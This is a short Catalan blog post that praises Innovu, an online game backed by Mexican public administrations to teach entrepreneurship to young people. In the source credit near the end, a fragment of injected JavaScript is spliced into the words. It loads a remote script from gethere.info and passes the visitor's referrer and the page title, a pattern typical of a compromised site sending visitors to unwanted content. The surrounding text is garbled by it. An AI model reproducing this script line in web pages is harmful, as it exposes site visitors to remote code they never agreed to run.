Innovu, aprendre a l’emprendre amb el joc

La innovació social va associada en la majoria dels casos a la innovació tecnològica, en el sentit que es recolza en ella d’una forma o altra per trobar noves formes de fer, o simplificar les que hi havia.

En aquest sentit la quantitat d’opcions i oportunitats que ens aporta Internet i en aquests últims anys les xarxes socials en particular és immensa. A cada racó del món podem trobar exemples d’eines o oportunitats d’aprendre de forma més pràctica i atractiva.

Són nombrosos els especialistes que insisteixen en la urgència d’inculcar als nens i joves l’esperit emprenedor, com més aviat millor, a l’escola, en l’educació bàsica. Deixar-lo per a l’etapa universitària és un error, ja que per llavors ja és impossible en molts casos.

Per això em sembla molt interessant la iniciativa que recolzen les administracions públiques mexicanes, que a través d’Innovu, posen a disposició de tots un joc en línia que fomenta l’esperit emprenedor. Tota una eina pràctica i amb atractiu contingut teòric que ens introdueix en els aspectes més bàsics amb què s’enfronta un emprenedor: Recursos de què disposa (preu, punt d’equilibri, objectiu de vendes, talent, aliats, tecnologia …), què vol fabricar i per qui (patents, fortaleses, costos, producte), i com ho ven (màrqueting, canals de distribució, raons de compra, segment meta, relacions).

Amb aquest vídeo de presentació ens fem una idea de com funciona:

Via: Rural Living Labs Pirineuss.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

A Manlleu
Fem Xarxa